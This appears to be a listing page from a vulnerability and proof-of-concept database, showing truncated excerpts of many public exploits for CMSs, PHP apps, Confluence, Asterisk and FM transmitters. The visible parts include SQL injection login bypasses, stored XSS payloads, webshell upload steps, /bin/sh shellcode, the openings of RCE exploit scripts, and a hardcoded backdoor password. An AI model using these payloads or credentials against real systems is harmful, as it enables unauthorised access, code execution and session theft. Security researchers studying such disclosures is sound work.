?day POC 漏洞数据库

# Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) # Date: 2023-03-26 # Exploit Author: Sean Pesce # Vendor Homepage: https://asterisk.org/ # Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/ # Version: 18.20.0 # Tested on: Debian Linux # CVE: CVE-2023-49294 #!/usr/bin/env python3 # # Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that # facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of # file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar # to the common INI confi…

# Exploit Title: Stored Cross-Site Scripting (XSS) in LimeSurvey Community Edition Version 5.3.32+220817 # Exploit Author: Subhankar Singh # Date: 2024-02-03 # Vendor: LimeSurvey # Software Link: https://community.limesurvey.org/releases/ # Version: LimeSurvey Community Edition Version 5.3.32+220817 # Tested on: Windows (Client) # CVE: CVE-2024-24506 ## Description: A critical security vulnerability exists in LimeSurvey Community Edition Version 5.3.32+220817, particularly in the "General Setting" functionality's "Administrator email address:" field. This allows an attacker to compromise the super-admin account, leading to potential theft of cookies and session tokens. …

# Exploit Title: NAGIOS XI SQLI # Google Dork: [if applicable] # Date: 02/26/2024 # Exploit Author: Jarod Jaslow (MAWK) https://www.linkedin.com/in/jarod-jaslow-codename-mawk-265144201/ # Vendor Homepage: https://www.nagios.com/changelog/#nagios-xi # Software Link: https://github.com/MAWK0235/CVE-2024-24401 # Version: Nagios XI Version 2024R1.01 # Tested on: Nagios XI Version 2024R1.01 LINUX # CVE : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24401 # import requests import subprocess import argparse import re import urllib3 import os import random import string from colorama import Fore, Style urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarnin…

# Exploit Title: Wallos - File Upload RCE (Authenticated) # Date: 2024-03-04 # Exploit Author: [email protected] # Vendor Homepage: https://github.com/ellite/Wallos # Software Link: https://github.com/ellite/Wallos # Version: < 1.11.2 # Tested on: Debian 12 Wallos allows you to upload an image/logo when you create a new subscription. This can be bypassed to upload a malicious .php file. POC --- 1) Log into the application. 2) Go to "New Subscription" 3) Upload Logo and choose your webshell .php 4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like: --- SNIP ----------------- POST /endpoints/subscription/add.php HTTP/1.1 Ho…

# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload # Google Dork: N/A # Exploit Author: SoSPiro # Date: 2024-02-18 # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/tourism-management-system-free-download/ # Version: 2.0 # Tested on: Windows 10 Pro # Impact: Allows admin to upload all files to the web server # CVE : N/A # Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. # PoC request POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 …

#include <stdio.h> #include <string.h> #define MAX_LEN 256 #define BUFFER_OVERRUN_LENGTH 50 #define SHELLCODE_LENGTH 32 // NOP sled to increase the chance of successful shellcode execution char nop_sled[SHELLCODE_LENGTH] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // Shellcode to execute /bin/sh char shellcode[SHELLCODE_LENGTH] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; void apply_cgi(char *vpn_client_ip) { char buffer[MAX_LEN]; strncpy(buffer, vpn_client_ip, MAX_LEN); printf("Client IP: %s\n", buffer)…

+ Exploit Title: MobileShop master v1.0 - SQL Injection Vuln. + Date: 2024-13-03 + Exploit Author: "HAZIM ARBAŞ" from EMA Security LTD - Siber Güvenlik ve Bilişim Hizmetleri (https://emasecurity.com) + Vendor Homepage: https://code-projects.org/mobile-shop-in-php-css-javascript-and-mysql-free-download/ + Software Link: https://download-media.code-projects.org/2020/04/Mobile_Shop_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip + Tested on: Windows 10 Pro + CWE: CWE-89 + CVSS: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + Type: WebApps + Platform: PHP ## References: + https://cwe.mitre.org/data/definitions/89.html + https://owasp.org/Top10/A03_2021-Injection/ ## Descr…

# Exploit Title:Insurance Management System PHP and MySQL 1.0 - Multiple Stored XSS # Date: 2024-02-08 # Exploit Author: Hakkı TOKLU # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/16995/insurance-management-system-php-mysql.html # Version: 1.0 # Tested on: Windows 11 / PHP 8.1 & XAMPP 3.3.0 Support Ticket Click on Support Tickets > Generate and add payload <img src=x onerror=prompt("xss")> to Subject and Description fields, then send the request. When admin visits the Support Tickets page, XSS will be triggered. Example Request : POST /e-insurance/Script/user/core/new_ticket HTTP/1.1 Host: l…

# Exploit Title: SPA-CART CMS - Stored XSS # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SPA-Cart # Vendor Homepage: https://spa-cart.com/ # Software Link: https://demo.spa-cart.com/ # Version: [1.9.0.3] # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: descr # Proof of Concept: demo.spa-cart.com/product/258 # HTTP Request: POST ////admin/products/258 HTTP/2 Host: demo.spa-cart.com Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx Content-Length: 1906 Sec-Ch-Ua: Accept: *…

#!/usr/bin/env python3 #coding: utf-8 # Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE) # Date: 2023-12-26 # Version: 4.0.0-RC1 - 4.4.14 # Vendor Homepage: https://craftcms.com/ # Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14 # Tested on: Ubuntu 22.04.3 LTS # Tested on: Craft CMS 4.4.14 # Exploit Author: Olivier Lasne # CVE : CVE-2023-41892 # References : # https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g # https://blog.calif.io/p/craftcms-rce import requests import sys, re if(len(sys.argv) < 2): print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m") exit() HOST = …

#!/usr/bin/perl use Socket; # Exploit Title: minaliC 2.0.0 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 03 january 2024 # Vendor Homepage: http://minalic.sourceforge.net/ # Notification vendor: No reported # Tested Version: minaliC 2.0.0 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=R_gkEjvpJNw #1. Description #This technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards…

# Title: CSZCMS v1.3.0 - SQL Injection (Authenticated) # Author: Abdulaziz Almetairy # Date: 27/01/2024 # Vendor: https://www.cszcms.com/ # Software: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download # Reference: https://github.com/oh-az # Tested on: Windows 11, MySQL, Apache # 1 - Log in to the admin portal http://localhost/cszcms/admin/login # 2 - Navigate to General Menu > Member Users. # 3 Click the 'View' button next to any username. # 4 Intercept the request GET /cszcms/admin/members/view/1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,applicatio…

# Exploit Title: Teacher Subject Allocation Management System 1.0 - 'searchdata' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://phpgurukul.com/teacher-subject-allocation-system-using-php-and-mysql # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17645 # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46024 ------------------------------------------------------------------------------- # Description: Teacher Subject Allocation Management System V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'searchdata' parame…

# Exploit Title: Simple Task List 1.0 - 'status' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/simple-task-list-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/12/Simple_Task_List_In_PHP_With_Source_Code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46023 ------------------------------------------------------------------------------- # Description: Simple Task List V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'status' parameter in the addTask.php file. This flaw can potent…

# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure # CVE: CVE-2023-6538 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-6538 PoC", usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: parser.add_argument( "--host", required=True, type=st…

# Exploit Title: Blood Bank 1.0 - 'bid' SQLi # Date: 2023-11-15 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46022 ------------------------------------------------------------------------------- # Description: The 'bid' parameter in the /delete.php file of Code-Projects Blood Bank V1.0 is susceptible to Out-of-Band SQL Injection. This vulnerability stems from inadequate protection mechanisms, allowing attackers to ex…

# Exploit Title: Employee Management System 1.0 - 'admin_id' SQLi # Date: 20-03-2024 # Exploit Author: Shubham Pandey # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html # Version: 1.0 # Tested on: Windows, Linux # CVE : CVE-2024-28595 # Description: SQL Injection vulnerability in Employee Management System v1.0 allows attackers to run arbitrary SQL commands via the admin_id parameter in update-admin.php. # POC: 1. Here we go to : http://127.0.0.1/taskmatic/index.php 2. Now login with default Username and Password. 3. Visit the URL: http://127.0.0.1/taskmati…

# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass # Google Dork: N/A # Date: 02-03-2024 # Exploit Author: ./H4X.Forensics - Diyar # Vendor Homepage: https://www.opensolution.org<https://www.opensolution.org/> # Software Link: [https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip] # Version: 6.7 # Tested on: Windows # CVE : N/A How to exploit : *--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php *--> Enter any Email like : [email protected]<mailto:[email protected]> *--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1 *--> Tick the Checkbox *--> Press Login *--> Congratz! *--> SQL Injection…

# Exploit Title: xbtitFM 4.1.18 Multiple Vulnerabilities # Date: 22-01-2024 # Vendor Homepage: https://xbtitfm.eu # Affected versions: 4.1.18 and prior # Description: The SQLi and the path traversal are unauthenticated, they don't require any user interaction to be exploited and are present in the default configuration of xbtitFM. The insecure file upload requires the file_hosting feature (hack) being enabled. If not, it can be enabled by gaining access to an administrator account. Looking at the state and the age of the codebase there are probably more, but who cares anyway... [Unauthenticated SQL Injection - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H] Some examples:…

TELSAT marKoni FM Transmitter 1.9.5 Backdoor Account Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: The transmitter has a hidden super administrative account 'factory' that has the hardcoded password 'inokram25' that allows full access to the web management inter…

TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password Vendor: TELSAT Srl Product web page: https://www.markoni.it Affected version: Markoni-D (Compact) FM Transmitters Markoni-DH (Exciter+Amplifiers) FM Transmitters Markoni-A (Analogue Modulator) FM Transmitters Firmware: 1.9.5 1.9.3 1.5.9 1.4.6 1.3.9 Summary: Professional FM transmitters. Desc: Unauthorized user could exploit this vulnerability to change his/her password, potentially gaining unauthorized access to sensitive informat…

#!/usr/bin/env python # # # TELSAT marKoni FM Transmitter 1.9.5 Root Command Injection PoC Exploit # # # Vendor: TELSAT Srl # Product web page: https://www.markoni.it # Affected version: Markoni-D (Compact) FM Transmitters # Markoni-DH (Exciter+Amplifiers) FM Transmitters # Markoni-A (Analogue Modulator) FM Transmitters # Firmware: 1.9.5 # 1.9.3 # 1.5.9 # 1.4.6 # 1.3.9 # # Summary: Professional FM transmitters. # # Desc: The marKoni FM transmitters are susceptible to unauthenticated # remote code execution wi…

# Exploit Title: Backdrop CMS 1.23.0 - Stored Cross-Site Scripting - Post Body Field # Date: 2023-08-21 # Exploit Author: Sinem Şahin # Vendor Homepage: https://backdropcms.org/ # Version: 1.23.0 # Tested on: Windows & XAMPP ==> Tutorial <== 1- Go to the following url. => http://(HOST)/backdrop/node/add/post 2- Write your xss payload in the body of the post. Formatting options should be RAW HTML to choose from. 3- Press "Save" button. XSS Payload ==> "<script>alert("post_body")</script>

# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability # Date: 25/1/2024 # Exploit Author: MaanVader # Vendor Homepage: https://www.atlassian.com/software/confluence # Software Link: https://www.atlassian.com/software/confluence # Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3 # Tested on: 8.5.3 # CVE : CVE-2023-22527 import requests import argparse import urllib3 from prompt_toolkit import PromptSession from prompt_toolkit.formatted_text import HTML from rich.console import Console # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Argument parsing parser = argparse.ArgumentParser(description="Send…

# Exploit Title: Gibbon LMS has a PHP Deserialization vulnerability on the v26.0.00 version # Date: 22.01.2024 # Exploit Author: SecondX.io Research Team(Ali Maharramli,Fikrat Guliev,Islam Rzayev ) # Vendor Homepage: https://gibbonedu.org/ # Software Link: https://github.com/GibbonEdu/core # Version: v26.0.00 # Tested on: Ubuntu 22.0 # CVE : CVE-2024-24725 import requests import re import sys import base64 import urllib.parse def login(target_host, target_port,email,password): url = f'http://{target_host}:{target_port}/login.php?timeout=true' headers = {"Content-Type": "multipart/form-data; boundary=---------------------------174475955731268836341556039466"} …